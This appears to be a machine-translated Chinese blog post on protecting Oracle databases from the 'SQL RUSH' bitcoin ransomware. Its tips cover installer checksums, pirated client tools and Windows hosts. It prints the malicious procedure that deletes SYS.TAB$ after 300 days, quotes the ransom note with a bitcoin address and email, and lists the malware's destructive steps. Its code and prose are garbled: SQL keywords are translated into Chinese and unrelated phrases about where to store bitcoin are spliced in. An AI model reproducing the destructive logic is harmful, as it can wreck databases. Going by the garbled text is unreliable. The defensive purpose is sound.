数据安全：Oracle 数据库避免比特币勒索软件的 3 个技巧

比特币喋喋不休。

我的一个朋友把它卖了一半。

但比特币勒索事件响亮而明确。

很多开源数据库的比特币保护主要靠关闭端口和注意密码和权限，但是Oracle数据库不一样。

其实这个话题我不是很想写，因为我们已经把比特币病毒检测加入到Oracle数据库的检测列表中，定期检测可以发现潜在的隐藏的。

不过从月初开始，突然刮起了一阵风，比特币病毒似乎又开始兴风作浪了，就连甲骨文官网都出来了攻略。

就在暗暗琢磨耀峰的时候，两个朋友提到XX数据库被比特币勒索了！

其实甲骨文数据库防比特币病毒就是这么简单。 不做的话，请各路大侠帮你解决后顾之忧，可能要花几万元人民币。

从简单之路开始，方法很简单：

建议 1.总是从Oracle官网下载Oracle数据库安装软件，检查MD5是否一致（18c开始换成更复杂的sha256sum）

不得不说，我之前完全没有想到这一点。 而也正是因为最近的恶风，几乎所有被病毒感染的用户在这里都是灾难。

Oracle数据库官方下载地址（商用请付费，否则别怪Larry老怪物不尊重知识产权）：

如果此字符串与您下载的软件不一致，请不要安装！

据传，在最近的浪潮中，某集成商提供的Oracle安装介质被篡改。

在 prvtsupp.plb 文件中，构建了一个 DBMS_SUPPORT_DBMONITORP 存储过程和一个 DBMS_SUPPORT_DBMONITOR 触发器。 当你的数据库运行300天后，tab$会被直接删除。

过程 DBMS_SUPPORT_DBMONITORP 是

DATE1 INT :=10;

开始

从 V$DATABASE 选择 TO_CHAR(SYSDATE-CREATED) INTO DATE1；

如果 (DATE1>=300) 那么

EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||'tablespace system as select * from sys.tab$';

删除 SYS.TAB$；

犯罪;

立即执行“改变系统检查点”；

万一;

结尾;

这样你的数据库就不能再用了，再开始open的时候会报ora-600[16703]的错误，

建议二：不要下载盗版PL/SQL软件或TOAD软件

我不是呼吁你买正版，反正你买不买也没人给我钱。

相反，这种情况是甲骨文数据库被比特币勒索的最早来源。

这种方式下病毒的表现类似于：

文件 /home/oracle/diag/rdbms/ora11/ora11/trace/ora11_ora_181625.trc:ORA-00604 中的错误：递归 SQL 级别 1 ORA-20315 发生错误：您的数据库已被 SQL RUSH 团队锁定 发送 5 比特币至这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE（大小写一致） 然后将你的 Oracle SID 邮寄到 sqlrush@mail.com 我们会让你知道如何解锁你的数据库 你好朋友，你的数据库被 SQL RUSH 团队黑了，发送 5 个比特币到地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE（案例敏感），然后将您的 Oracle SID 发送到邮件地址 sqlrush@mail.com，我们会让您知道如何解锁您的数据库。ORA-06512: at "NEUSOFT_RPT.DBMS_line15INTERNAL2OR" 2

它主要生成几个对象：

DBMS_SUPPORT_INTERNAL

DBMS_SYSTEM_INTERNAL

DBMS_CORE_INTERNAL

1.当数据库创建时间大于1200天时，开始备份tab$表

2.删除tab$(sys,xdb)中owner#为0和38的记录

3.通过SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(v$controlfile_record_section)清除备份信息

4.然后使用DBMS_SYSTEM.KSDWRT在你的alert log中写入2046提示。 嗨，朋友，你的数据库被 SQL RUSH Team 入侵了，发送 5 个比特币到地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE（区分大小写），然后发送到你的 Oracle SID 邮件地址 sqlrush@mail.com，我们会告诉你如何解锁你的数据库。 您的数据库已被 SQL RUSH 团队锁定。 发送 5 个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE（大小写一致）然后邮寄你的 Oracle SID 地址 sqlrush@mail.com 我们会让你知道如何解锁你的数据库

5.在前台抛出另一个类似4的警告信息

建议三：不要在任何windows平台上安装Oracle数据库！

在我看来，windows是一个普通的个人操作系统，永远不适合企业级操作系统。

最重要的不是我的感觉/想法，而是，安装在windows上，你的Oracle数据库被比特币病毒攻击的概率会增加99倍（当然，99是我胡说八道，只是告诉你概率太高了）！

Windows上安装的Oracle，除了上面两个危险之外，他直接给你加密了数据库软件安装目录下的文件。

这还不是最糟糕的。 毕竟，你只需要在另一台机器上安装一个软件，就像前两者一样。

最糟糕的是某个开发者在文件中放了一些配置文件，通常这个文件没有备份，那么问题就严重多了。 这些数据你都不可以吗？

想要数据安全，远离甲骨文比特币病毒，严格按照以上三点建议即可。

当然，数据安全远不止比特币病毒那么简单。

今天看到群里转发的银保监会通知截图：

也不知道是哪家银行。

作为一名技术布道者，我关注的是讲一件事。 在与每位客户交流时，我都会反复强调，我是保健医生比特币放哪里最安全，不是江湖郎中。 别指望你得癌症，我一定会康复的。 因此，您需要对基础设施、人员和流程进行投资，以便我们共同将您的风险降至最低。

这份通知最无聊的是最后一行“2016年以来比特币放哪里最安全，监管部门多次通报……本行董事会、高级管理人员未尽职尽责……”

如果真是这样，真为这家银行的IT部门感到悲哀！ 你只能默默的背锅！

巧的是，上周的一个晚上，我也被领导加进了一个故障处理组。 没有备份，没有高可用性......

对不起，我不是药神，也不是庸医，我只是个保健医生！ 我能做的，就是一点点告诉你隐患在哪里，需要我们一起去解决，而不是指望我能回春！

比特币病毒也是如此！

希望您的数据安全无虞！